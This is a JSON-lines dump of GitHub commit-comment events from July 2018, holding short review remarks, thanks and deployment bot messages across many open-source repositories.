{"id":"8011567829","type":"CommitCommentEvent","actor":{"login":"axdanbol"},"repo":{"name":"cns-iu/ngx-dino"},"payload":{"comment":{"id":29817248,"position":null,"line":null,"path":null,"commit_id":"f902b1a63aaf17cfb29fc0996e87fb0ef69c3cd7","created_at":"2018-07-24T17:11:46Z","updated_at":"2018-07-24T17:11:46Z","author_association":"CONTRIBUTOR","body":"Angular doesn't support typescript >2.8 yet 😢 "}},"created_at":"2018-07-24T17:11:46Z"}
{"id":"8011569791","type":"CommitCommentEvent","actor":{"login":"Cereal-Killa"},"repo":{"name":"Cereal-Killa/NEW-NUSGrabberGUI"},"payload":{"comment":{"id":29817252,"position":null,"line":null,"path":null,"commit_id":"eb9473e307da4a789bb5cbdd94ec7bfc74bd5730","created_at":"2018-07-24T17:12:09Z","updated_at":"2018-07-24T17:12:09Z","author_association":"OWNER","body":"Sorry about the mess visual studio did with the designer code, I can clean it up if you want by simply setting the anchors manually and update this commit with only the crucial changes to keep it resizable, let me know."}},"created_at":"2018-07-24T17:12:09Z"}
{"id":"8011576393","type":"CommitCommentEvent","actor":{"login":"JuanMigs"},"repo":{"name":"JuanMigs/ictprog-lab"},"payload":{"comment":{"id":29817269,"position":null,"line":null,"path":null,"commit_id":"e53ddad84596523a7a87a77a359136ab2de35474","created_at":"2018-07-24T17:13:30Z","updated_at":"2018-07-24T17:13:30Z","author_association":"OWNER","body":"e bisa T.T"}},"created_at":"2018-07-24T17:13:30Z"}
{"id":"8011584304","type":"CommitCommentEvent","actor":{"login":"ErkamKahriman"},"repo":{"name":"TuranicTeam/Altay"},"payload":{"comment":{"id":29817287,"position":null,"line":null,"path":null,"commit_id":"759aa68b47f970654094556c0ec2526660a6446c","created_at":"2018-07-24T17:14:59Z","updated_at":"2018-07-24T17:14:59Z","author_association":"CONTRIBUTOR","body":"Anvil fixlenmemis"}},"created_at":"2018-07-24T17:14:59Z"}
{"id":"8011587377","type":"CommitCommentEvent","actor":{"login":"nielsbom"},"repo":{"name":"FCCAmsterdam/money-machine"},"payload":{"comment":{"id":29817296,"position":1,"line":1,"path":"main/clearbutton.js","commit_id":"0532fa120bfbf876d16c4a38048979b469c9b726","created_at":"2018-07-24T17:15:34Z","updated_at":"2018-07-24T17:15:34Z","author_association":"CONTRIBUTOR","body":"I think you can delete this."}},"created_at":"2018-07-24T17:15:34Z"}
{"id":"8011588055","type":"CommitCommentEvent","actor":{"login":"Jousway"},"repo":{"name":"etternagame/etterna"},"payload":{"comment":{"id":29817297,"position":null,"line":null,"path":null,"commit_id":"86a31db52241c00dbd78304903680116f624f28d","created_at":"2018-07-24T17:15:41Z","updated_at":"2018-07-24T17:15:41Z","author_association":"CONTRIBUTOR","body":"👍 "}},"created_at":"2018-07-24T17:15:41Z"}
{"id":"8011593098","type":"CommitCommentEvent","actor":{"login":"boogheta"},"repo":{"name":"regardscitoyens/the-law-factory-parser-test-cases"},"payload":{"comment":{"id":29817304,"position":null,"line":null,"path":null,"commit_id":"de241f5a96172d5da497ee47e3a91dab0836dbc7","created_at":"2018-07-24T17:16:40Z","updated_at":"2018-07-24T17:16:40Z","author_association":"CONTRIBUTOR","body":"I think we usually uniformize those quotes into regular ones, we probably do it only for the text, applying it to the titles could maybe be useful too ?"}},"created_at":"2018-07-24T17:16:40Z"}
{"id":"8011593244","type":"CommitCommentEvent","actor":{"login":"Mazdaywik"},"repo":{"name":"kirsnegir/utp2018-8-flowcharts"},"payload":{"comment":{"id":29817305,"position":null,"line":null,"path":null,"commit_id":"b28c1b2c0c945535115d64608a87aacf6f12e818","created_at":"2018-07-24T17:16:42Z","updated_at":"2018-07-24T17:16:42Z","author_association":"NONE","body":"Комментарии к коммитам надо делать более осмысленными."}},"created_at":"2018-07-24T17:16:42Z"}
{"id":"8011593383","type":"CommitCommentEvent","actor":{"login":"carver"},"repo":{"name":"ethereum/py-evm"},"payload":{"comment":{"id":29817306,"position":8,"line":9,"path":"docs/release_notes/trinity.rst","commit_id":"7bddb6fba361a7719bfc9ddd7ec8199e9b6b1fa0","created_at":"2018-07-24T17:16:43Z","updated_at":"2018-07-24T17:16:43Z","author_association":"CONTRIBUTOR","body":"Sphinx URLs need an underscore after the closing backtick: http://www.sphinx-doc.org/en/master/usage/restructuredtext/basics.html#external-links"}},"created_at":"2018-07-24T17:16:43Z"}
{"id":"8011596789","type":"CommitCommentEvent","actor":{"login":"huaiyudavid"},"repo":{"name":"Microsoft/ChakraCore"},"payload":{"comment":{"id":29817312,"position":50,"line":3323,"path":"lib/Backend/IRBuilder.cpp","commit_id":"f909b6144e7531819ee974a33d29ef7f08f4da2b","created_at":"2018-07-24T17:17:24Z","updated_at":"2018-07-24T17:17:24Z","author_association":"NONE","body":"Ah, I prefer that too but the compiler gets unhappy if I initialize them in the switch case 😢 "}},"created_at":"2018-07-24T17:17:24Z"}
{"id":"8011597765","type":"CommitCommentEvent","actor":{"login":"pipermerriam"},"repo":{"name":"ethereum/py-evm"},"payload":{"comment":{"id":29817316,"position":8,"line":9,"path":"docs/release_notes/trinity.rst","commit_id":"7bddb6fba361a7719bfc9ddd7ec8199e9b6b1fa0","created_at":"2018-07-24T17:17:35Z","updated_at":"2018-07-24T17:17:35Z","author_association":"MEMBER","body":":+1: on it"}},"created_at":"2018-07-24T17:17:35Z"}
{"id":"8011598375","type":"CommitCommentEvent","actor":{"login":"Xorboo"},"repo":{"name":"getnamo/ZipUtility-ue4"},"payload":{"comment":{"id":29817319,"position":null,"line":null,"path":null,"commit_id":"5d9e30e028d80c2bb702e5611dd0bf8c3d04ab92","created_at":"2018-07-24T17:17:42Z","updated_at":"2018-07-24T17:17:42Z","author_association":"NONE","body":"This string can differ for every user: VS location, VS version (community/professional) and tools version, and there is no warning if something goes wrong. Can there be a better approach for this?\r\nI don't know how to fix it properly, so I've added a temp hack, it solves the problem at least partially.\r\n\r\n```cs\r\nstring vsPath = \"C:/Program Files (x86)/Microsoft Visual Studio/2017\";\r\nstring vsVersion = Directory.GetDirectories(vsPath)[0];\r\nstring msvcPath = Path.Combine(vsPath, vsVersion, \"VC/Tools/MSVC\");\r\nstring msvcVersion = Directory.GetDirectories(msvcPath)[0];\r\nstring atlPath = Path.Combine(msvcPath, msvcVersion, \"atlmfc\");\r\nif (!Directory.Exists(atlPath))\r\n    System.Console.WriteLine(\"Error: Couldn't find an ATLPath, fix it in ZipUtility.Build.cs\");\r\nreturn atlPath;\r\n```\r\n\r\nFor a proper solution it would be nice to use `VCEnvironment.cs` or at least `WindowsPlatform.TryGetVCToolChainDir` from Unreal source, but they both are private and i don't know if there is a way to access them."}},"created_at":"2018-07-24T17:17:42Z"}
{"id":"8011604726","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29817331,"position":null,"line":null,"path":null,"commit_id":"0a78a9540124726b039ec5a2cc41ab14aefcd49f","created_at":"2018-07-24T17:18:55Z","updated_at":"2018-07-24T17:18:55Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [1913clamav](https://1913clamav-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/clamav](https://1913clamav-static-docs.pantheonsite.io/docs/clamav)\n"}},"created_at":"2018-07-24T17:18:55Z"}
{"id":"8011606775","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-css"},"payload":{"comment":{"id":29817336,"position":null,"line":null,"path":null,"commit_id":"e2df9c9cd9f9047700cd455f61c0885064d773ba","created_at":"2018-07-24T17:19:20Z","updated_at":"2018-07-24T17:19:20Z","author_association":"OWNER","body":"CSS Inheritance: [css-inheritance.pdf](https://github.com/whyang0808/learning-css/files/2224656/css-inheritance.pdf)\r\n"}},"created_at":"2018-07-24T17:19:20Z"}
{"id":"8011606829","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29817337,"position":null,"line":null,"path":null,"commit_id":"35cc44cf2dac27ab42f450a9354b42b42599e403","created_at":"2018-07-24T17:19:20Z","updated_at":"2018-07-24T17:19:20Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-908](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-908).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-908-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-24T17:19:20Z"}
{"id":"8011608483","type":"CommitCommentEvent","actor":{"login":"VictoriaValentine"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29817341,"position":null,"line":null,"path":null,"commit_id":"f786cfe62961390a1d417f4c82d9530c17635552","created_at":"2018-07-24T17:19:38Z","updated_at":"2018-07-24T17:19:38Z","author_association":"COLLABORATOR","body":"Regarding the \"forked repository\"... don't know how I did that... may need some more assistance there..."}},"created_at":"2018-07-24T17:19:38Z"}
{"id":"8011617781","type":"CommitCommentEvent","actor":{"login":"nine7nine"},"repo":{"name":"TheRagingBeast/Marlin_exns-eas"},"payload":{"comment":{"id":29817354,"position":null,"line":null,"path":null,"commit_id":"d95e49d215650aeac2d2a67c4430315c9407f547","created_at":"2018-07-24T17:21:26Z","updated_at":"2018-07-24T17:21:26Z","author_association":"NONE","body":"Just commenting here, since no other way to contact you.\r\n\r\nJust a heads up ~ I routinely force-update my kernel's git branches && also switch branch HEAD after I've bumped versions.... This might make it more difficult for forks, as in you will probably hit some bumps here and there with trying to merge stuff...\r\n\r\nthe other thing; when android P is released, my repo will be deprecated and everything will be rebased / redone in a new repo. (i do this on every major android release).\r\n"}},"created_at":"2018-07-24T17:21:26Z"}
{"id":"8011618476","type":"CommitCommentEvent","actor":{"login":"bamboo"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29817355,"position":null,"line":null,"path":null,"commit_id":"dbeb6510777018b2fb6c5f57c5ced845ffc1cbe2","created_at":"2018-07-24T17:21:34Z","updated_at":"2018-07-24T17:21:34Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-24T17:21:34Z"}
{"id":"8011621280","type":"CommitCommentEvent","actor":{"login":"marcocesar1"},"repo":{"name":"marcocesar1/github-laravel"},"payload":{"comment":{"id":29817358,"position":4,"line":29,"path":"app/User.php","commit_id":"8d3914ce71dce0574d1ebec6879803409e47037e","created_at":"2018-07-24T17:22:07Z","updated_at":"2018-07-24T17:22:07Z","author_association":"OWNER","body":"Este es el villano favorito"}},"created_at":"2018-07-24T17:22:07Z"}
{"id":"8011622672","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29817360,"position":null,"line":null,"path":null,"commit_id":"7d5045210157a55ac2648e396f0b5350a602bc15","created_at":"2018-07-24T17:22:23Z","updated_at":"2018-07-24T17:22:23Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-274](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-274).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-274-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-24T17:22:23Z"}
{"id":"8011624929","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29817362,"position":null,"line":null,"path":null,"commit_id":"fd38569fa7be50f0cddc03d6d77c19ec33bfa0c8","created_at":"2018-07-24T17:22:49Z","updated_at":"2018-07-24T17:22:49Z","author_association":"OWNER","body":"Great to see the doxygen comments.  A makefile rule to make the documentation would also be great!"}},"created_at":"2018-07-24T17:22:49Z"}
{"id":"8011626325","type":"CommitCommentEvent","actor":{"login":"sabrinaprice"},"repo":{"name":"bitcoin/bips"},"payload":{"comment":{"id":29817364,"position":5,"line":6,"path":"bip-0070/paymentrequest.proto","commit_id":"796398d3fbaa08ba361f134ea6e288dc71577d8f","created_at":"2018-07-24T17:23:07Z","updated_at":"2018-07-24T17:23:07Z","author_association":"NONE","body":"Thank u"}},"created_at":"2018-07-24T17:23:07Z"}
{"id":"8011629449","type":"CommitCommentEvent","actor":{"login":"sabrinaprice"},"repo":{"name":"bitcoin/bips"},"payload":{"comment":{"id":29817368,"position":null,"line":null,"path":null,"commit_id":"796398d3fbaa08ba361f134ea6e288dc71577d8f","created_at":"2018-07-24T17:23:42Z","updated_at":"2018-07-24T17:23:42Z","author_association":"NONE","body":"Thanks"}},"created_at":"2018-07-24T17:23:42Z"}
{"id":"8011630089","type":"CommitCommentEvent","actor":{"login":"banesullivan"},"repo":{"name":"banesullivan/awesome-open-geoscience"},"payload":{"comment":{"id":29817371,"position":null,"line":null,"path":null,"commit_id":"09dca034837de9d4e0d6ed8986ca1b85165b10f9","created_at":"2018-07-24T17:23:49Z","updated_at":"2018-07-24T17:23:49Z","author_association":"OWNER","body":"Source: https://gitlab.kitware.com/brad.king/paraview/blob/master/Qt/Components/Resources/Icons/pvIcon.svg"}},"created_at":"2018-07-24T17:23:49Z"}
{"id":"8011630194","type":"CommitCommentEvent","actor":{"login":"marcocesar1"},"repo":{"name":"marcocesar1/github-laravel"},"payload":{"comment":{"id":29817372,"position":null,"line":null,"path":null,"commit_id":"8d3914ce71dce0574d1ebec6879803409e47037e","created_at":"2018-07-24T17:23:51Z","updated_at":"2018-07-24T17:23:51Z","author_association":"OWNER","body":"## Notas\r\nEntiendo porque estamos haciendo pruebas los comentarios en los commit"}},"created_at":"2018-07-24T17:23:51Z"}
{"id":"8011633024","type":"CommitCommentEvent","actor":{"login":"sabrinaprice"},"repo":{"name":"bitcoin/bips"},"payload":{"comment":{"id":29817378,"position":8,"line":9,"path":"bip-0070/paymentrequest.proto","commit_id":"796398d3fbaa08ba361f134ea6e288dc71577d8f","created_at":"2018-07-24T17:24:24Z","updated_at":"2018-07-24T17:24:24Z","author_association":"NONE","body":"Thanks"}},"created_at":"2018-07-24T17:24:24Z"}
{"id":"8011666100","type":"CommitCommentEvent","actor":{"login":"thibaultcha"},"repo":{"name":"Kong/kong"},"payload":{"comment":{"id":29817456,"position":107,"line":107,"path":"spec/03-plugins/21-ldap-auth/02-invalidations_spec.lua","commit_id":"5c5305141bbcd3ef44d2b2c6c4eb04f8a53ba96b","created_at":"2018-07-24T17:30:29Z","updated_at":"2018-07-24T17:30:29Z","author_association":"MEMBER","body":"This test says \"should not do negative cache\" (somewhat vague), but this request and assertion clearly show that there _is_ caching (although not negative, as a user was found in the LDAP server). This seems to comfort my previous theory that the above commented change has no effect on the result of this test (therefore, it is a false positive). Do you concur?"}},"created_at":"2018-07-24T17:30:29Z"}
{"id":"8011670173","type":"CommitCommentEvent","actor":{"login":"NTaylorMullen"},"repo":{"name":"anurse/HungRGames"},"payload":{"comment":{"id":29817463,"position":null,"line":null,"path":null,"commit_id":"6b12f4bcd2f0bf0765fbad27f9a22eb2b2982374","created_at":"2018-07-24T17:31:13Z","updated_at":"2018-07-24T17:31:13Z","author_association":"COLLABORATOR","body":"DUDDEEEEEE this is so sick, bring in a controller so we can try this out!"}},"created_at":"2018-07-24T17:31:13Z"}
{"id":"8011675185","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"AlmuraDev/SGCraft"},"payload":{"comment":{"id":29817477,"position":58,"line":924,"path":"src/mod/gcewing/sg/SGBaseTE.java","commit_id":"45de67c7f8fc5977ed8e78f0bd6356cc50e4715d","created_at":"2018-07-24T17:32:10Z","updated_at":"2018-07-24T17:32:10Z","author_association":"MEMBER","body":"Once you hit this you need to break else you're doing x-amount of TE lookups afterwards for no reason............"}},"created_at":"2018-07-24T17:32:10Z"}
{"id":"8011675303","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29817479,"position":null,"line":null,"path":null,"commit_id":"8d06d5d2721f46e7da38fad99e07d2c3a8300e96","created_at":"2018-07-24T17:32:11Z","updated_at":"2018-07-24T17:32:11Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-307](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-307).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-307-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-24T17:32:11Z"}
{"id":"8011685131","type":"CommitCommentEvent","actor":{"login":"deciduously"},"repo":{"name":"deciduously/mifkad"},"payload":{"comment":{"id":29817494,"position":null,"line":null,"path":null,"commit_id":"43e65ee821ec68686f246b9239a14e67393ae09b","created_at":"2018-07-24T17:34:06Z","updated_at":"2018-07-24T17:34:06Z","author_association":"OWNER","body":"If  you're still having problems - I think `webpack.config.js` has the wrong output dir for Index.js.  I'm not sure why it worked before committing, check it out after work"}},"created_at":"2018-07-24T17:34:06Z"}
{"id":"8011686056","type":"CommitCommentEvent","actor":{"login":"peti"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29817496,"position":null,"line":null,"path":null,"commit_id":"bc52706a044a229960d9d37deb6b1fdde688d777","created_at":"2018-07-24T17:34:16Z","updated_at":"2018-07-24T17:34:16Z","author_association":"MEMBER","body":"Thanks!"}},"created_at":"2018-07-24T17:34:16Z"}
{"id":"8011687239","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"AlmuraDev/SGCraft"},"payload":{"comment":{"id":29817499,"position":45,"line":78,"path":"src/mod/gcewing/sg/ic2/zpm/ZpmInterfaceCart.java","commit_id":"45de67c7f8fc5977ed8e78f0bd6356cc50e4715d","created_at":"2018-07-24T17:34:29Z","updated_at":"2018-07-24T17:34:29Z","author_association":"MEMBER","body":"You need to store the result of this call and ONLY open the Gui is this call returns false..."}},"created_at":"2018-07-24T17:34:29Z"}
{"id":"8011687262","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-css"},"payload":{"comment":{"id":29817500,"position":null,"line":null,"path":null,"commit_id":"0a5ffcf74d9bfd675729c5f303fd4328dcc753a6","created_at":"2018-07-24T17:34:30Z","updated_at":"2018-07-24T17:34:30Z","author_association":"OWNER","body":"CSS Combinators: [css-combinators.pdf](https://github.com/whyang0808/learning-css/files/2224697/css-combinators.pdf)\r\nCSS Value Types: [css-value-types.pdf](https://github.com/whyang0808/learning-css/files/2224710/css-value-types.pdf)\r\n"}},"created_at":"2018-07-24T17:34:30Z"}
{"id":"8011688632","type":"CommitCommentEvent","actor":{"login":"peti"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29817502,"position":null,"line":null,"path":null,"commit_id":"e7be6e0d00ad6e25350ba70c2c8138d43482aab7","created_at":"2018-07-24T17:34:47Z","updated_at":"2018-07-24T17:34:47Z","author_association":"MEMBER","body":"Hmpf. Thanks. I am not sure why my pre-commit hook didn't catch those. :-("}},"created_at":"2018-07-24T17:34:47Z"}
{"id":"8011691041","type":"CommitCommentEvent","actor":{"login":"dinony"},"repo":{"name":"UnderGreen/ansible-role-mongodb"},"payload":{"comment":{"id":29817506,"position":21,"line":26,"path":"tasks/install.debian.yml","commit_id":"6cf617c771cd53e1ae212b52a9a4661bc1c03e64","created_at":"2018-07-24T17:35:14Z","updated_at":"2018-07-24T17:35:14Z","author_association":"NONE","body":"Hi, this seems to lock stretch to mongodb v3.6 only? "}},"created_at":"2018-07-24T17:35:14Z"}
{"id":"8011692506","type":"CommitCommentEvent","actor":{"login":"deciduously"},"repo":{"name":"deciduously/mifkad"},"payload":{"comment":{"id":29817509,"position":null,"line":null,"path":null,"commit_id":"43e65ee821ec68686f246b9239a14e67393ae09b","created_at":"2018-07-24T17:35:31Z","updated_at":"2018-07-24T17:35:31Z","author_association":"OWNER","body":"Actually you still have the old handler in there too.  This isn't really done."}},"created_at":"2018-07-24T17:35:31Z"}
{"id":"8011700467","type":"CommitCommentEvent","actor":{"login":"f205v"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29817525,"position":null,"line":null,"path":null,"commit_id":"181ef94a3fb5fba449216f3935c054c2a3d45c69","created_at":"2018-07-24T17:37:06Z","updated_at":"2018-07-24T17:37:06Z","author_association":"CONTRIBUTOR","body":"pool10j is 1996 and not 1997.\r\nshould be changed in funworld.cpp line 51 and mame.lst line 13057"}},"created_at":"2018-07-24T17:37:06Z"}
{"id":"8011707688","type":"CommitCommentEvent","actor":{"login":"modify"},"repo":{"name":"k807/spring-remote"},"payload":{"comment":{"id":29817532,"position":null,"line":null,"path":null,"commit_id":"fb07de5e0963d777aede14a59d9a52759da26631","created_at":"2018-07-24T17:38:31Z","updated_at":"2018-07-24T17:38:31Z","author_association":"NONE","body":"yo can u stop tagging me im getting like 100 email notifs thank"}},"created_at":"2018-07-24T17:38:31Z"}
{"id":"8011718669","type":"CommitCommentEvent","actor":{"login":"Skeletonxf"},"repo":{"name":"Skeletonxf/image-extract"},"payload":{"comment":{"id":29817551,"position":null,"line":null,"path":null,"commit_id":"be3c5afb83e0f6a38e77d0f3bf61969691b78e9f","created_at":"2018-07-24T17:40:38Z","updated_at":"2018-07-24T17:40:38Z","author_association":"OWNER","body":"Commit message is not strictly true. Background images specified with `background` and certain background images specified with `backgroundImage` will now be detected that previously were not, due to explicitly looking for them and improved string parsing to find the url respectively."}},"created_at":"2018-07-24T17:40:38Z"}
{"id":"8011722807","type":"CommitCommentEvent","actor":{"login":"nszumowski"},"repo":{"name":"nszumowski/demo-2"},"payload":{"comment":{"id":29817558,"position":1,"line":1,"path":"lipsum.txt","commit_id":"2733e178387fe7c8df39029c2d3de092a2de8090","created_at":"2018-07-24T17:41:29Z","updated_at":"2018-07-24T17:41:29Z","author_association":"OWNER","body":"Cool comment"}},"created_at":"2018-07-24T17:41:29Z"}
{"id":"8011729266","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29817581,"position":41,"line":98,"path":"devel/cctools/Portfile","commit_id":"2ecf7c5df88d0a230c12edbfcaa7fa458423b674","created_at":"2018-07-24T17:42:42Z","updated_at":"2018-07-24T17:42:42Z","author_association":"CONTRIBUTOR","body":"Why declare an empty variant? Why not put the variant's code inside its curly braces like normal?"}},"created_at":"2018-07-24T17:42:42Z"}
{"id":"8011730088","type":"CommitCommentEvent","actor":{"login":"dbertranou"},"repo":{"name":"dbertranou/trini"},"payload":{"comment":{"id":29817583,"position":null,"line":null,"path":null,"commit_id":"51a32004ff9a1af7f0cb9b3b9e81d4b1b280302b","created_at":"2018-07-24T17:42:52Z","updated_at":"2018-07-24T17:42:52Z","author_association":"OWNER","body":"Rompiste todo."}},"created_at":"2018-07-24T17:42:52Z"}
{"id":"8011730680","type":"CommitCommentEvent","actor":{"login":"xabbuh"},"repo":{"name":"symfony/http-foundation"},"payload":{"comment":{"id":29817587,"position":null,"line":null,"path":null,"commit_id":"f3d7d66f0a2170372a20292a940a294f34302c8e","created_at":"2018-07-24T17:42:58Z","updated_at":"2018-07-24T17:42:58Z","author_association":"MEMBER","body":"If you maintain a reusable package that supports both Symfony 4.0 and 4.1 at the same time, you can follow the same approach and deprecate the old signature too. "}},"created_at":"2018-07-24T17:42:58Z"}
{"id":"8011731690","type":"CommitCommentEvent","actor":{"login":"nszumowski"},"repo":{"name":"nszumowski/demo-2"},"payload":{"comment":{"id":29817591,"position":null,"line":null,"path":null,"commit_id":"e4d7fcb56aef605855864f8736d97b257b8a76d8","created_at":"2018-07-24T17:43:11Z","updated_at":"2018-07-24T17:43:11Z","author_association":"OWNER","body":"this file is so emo"}},"created_at":"2018-07-24T17:43:11Z"}
{"id":"8011733135","type":"CommitCommentEvent","actor":{"login":"miketypeguy"},"repo":{"name":"Signiant/External-user-provisioning"},"payload":{"comment":{"id":29817592,"position":27,"line":23,"path":"setup.py","commit_id":"0f9b5d25013ad700c290ec0e5687a7196a48ef68","created_at":"2018-07-24T17:43:27Z","updated_at":"2018-07-24T17:43:27Z","author_association":"MEMBER","body":"Not sure we need this line, also there's a typo.  Maybe remove these as it's assumed you would upload to pypi with those tools."}},"created_at":"2018-07-24T17:43:27Z"}
{"id":"8011733214","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29817593,"position":46,"line":103,"path":"devel/cctools/Portfile","commit_id":"2ecf7c5df88d0a230c12edbfcaa7fa458423b674","created_at":"2018-07-24T17:43:27Z","updated_at":"2018-07-24T17:43:27Z","author_association":"CONTRIBUTOR","body":"These do not clear any previous `pre-destroot` or `post-destroot` blocks; instead, they add new empty `pre-destroot` and `post-destroot` blocks that do nothing, so they should be removed."}},"created_at":"2018-07-24T17:43:27Z"}
{"id":"8011736861","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29817599,"position":61,"line":118,"path":"devel/cctools/Portfile","commit_id":"2ecf7c5df88d0a230c12edbfcaa7fa458423b674","created_at":"2018-07-24T17:44:07Z","updated_at":"2018-07-24T17:44:07Z","author_association":"CONTRIBUTOR","body":"All of this could have been accomplished with native Tcl code that would not have necessitated launching so many external executables."}},"created_at":"2018-07-24T17:44:07Z"}
{"id":"8011741151","type":"CommitCommentEvent","actor":{"login":"balsoft"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29817613,"position":3,"line":3,"path":"pkgs/applications/office/libreoffice/wrapper.sh","commit_id":"95a819c0026a7a3c0dd2099e1c53fea95430c505","created_at":"2018-07-24T17:44:50Z","updated_at":"2018-07-24T17:44:50Z","author_association":"NONE","body":"This actually seems to break themes and fonts ( #43801 ). Maybe we could do something to choose something sane as default? Like if `services.xserver.desktopEnvironments.plasma5.enable = true`, then use \"kde4\";  if `services.xserver.desktopEnvironments.gnome3.enable = true` or `services.xserver.desktopEnvironments.mate.enable = true` or `services.xserver.desktopEnvironments.xfce4.enable = true`, then use \"gtk3\"; otherwise use \"gen\"."}},"created_at":"2018-07-24T17:44:50Z"}
{"id":"8011743616","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29817620,"position":89,"line":133,"path":"devel/cctools/Portfile","commit_id":"2ecf7c5df88d0a230c12edbfcaa7fa458423b674","created_at":"2018-07-24T17:45:18Z","updated_at":"2018-07-24T17:45:18Z","author_association":"CONTRIBUTOR","body":"`touch` can also be done in Tcl, without needing to run a shell with `system`."}},"created_at":"2018-07-24T17:45:18Z"}
{"id":"8011748947","type":"CommitCommentEvent","actor":{"login":"hardwareadictos"},"repo":{"name":"GZR-Kernels/kernel_oneplus_msm8998"},"payload":{"comment":{"id":29817631,"position":null,"line":null,"path":null,"commit_id":"bf8ae173eda3f4634af60c8dc1c9f706ed6f0fb0","created_at":"2018-07-24T17:46:17Z","updated_at":"2018-07-24T17:46:17Z","author_association":"NONE","body":"YAY finally :P"}},"created_at":"2018-07-24T17:46:17Z"}
{"id":"8011752179","type":"CommitCommentEvent","actor":{"login":"cjones051073"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29817634,"position":46,"line":103,"path":"devel/cctools/Portfile","commit_id":"2ecf7c5df88d0a230c12edbfcaa7fa458423b674","created_at":"2018-07-24T17:46:46Z","updated_at":"2018-07-24T17:46:46Z","author_association":"CONTRIBUTOR","body":"OK."}},"created_at":"2018-07-24T17:46:46Z"}
{"id":"8011753425","type":"CommitCommentEvent","actor":{"login":"cjones051073"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29817636,"position":61,"line":118,"path":"devel/cctools/Portfile","commit_id":"2ecf7c5df88d0a230c12edbfcaa7fa458423b674","created_at":"2018-07-24T17:46:56Z","updated_at":"2018-07-24T17:46:56Z","author_association":"CONTRIBUTOR","body":"Probably.. I am not that familiar with Tcl so just copied this from a pattern I found in another port file. It works and is not slow so I see no real issue."}},"created_at":"2018-07-24T17:46:56Z"}
{"id":"8011756642","type":"CommitCommentEvent","actor":{"login":"cjones051073"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29817645,"position":89,"line":133,"path":"devel/cctools/Portfile","commit_id":"2ecf7c5df88d0a230c12edbfcaa7fa458423b674","created_at":"2018-07-24T17:47:29Z","updated_at":"2018-07-24T17:47:29Z","author_association":"CONTRIBUTOR","body":"I did not touch this line. I just added the check block on if the Xcode variant was set."}},"created_at":"2018-07-24T17:47:29Z"}
{"id":"8011757315","type":"CommitCommentEvent","actor":{"login":"victortaloud"},"repo":{"name":"victortaloud/cloud_composer"},"payload":{"comment":{"id":29817647,"position":106,"line":210,"path":"traitement.py","commit_id":"7e353137d4773490791dff145622dac8f286cff5","created_at":"2018-07-24T17:47:38Z","updated_at":"2018-07-24T17:47:38Z","author_association":"OWNER","body":"regarder si on a bien des matché "}},"created_at":"2018-07-24T17:47:38Z"}
{"id":"8011759327","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29817656,"position":5,"line":6,"path":"devel/cctools/Portfile","commit_id":"b950e5ce6d2e10f20091e1995a18f66ba75a6985","created_at":"2018-07-24T17:48:01Z","updated_at":"2018-07-24T17:48:01Z","author_association":"CONTRIBUTOR","body":"Why? Didn't the previous change to the port merely add the new xcode variant? If so, forcing users who already had the port installed to rebuild it is pointless."}},"created_at":"2018-07-24T17:48:01Z"}
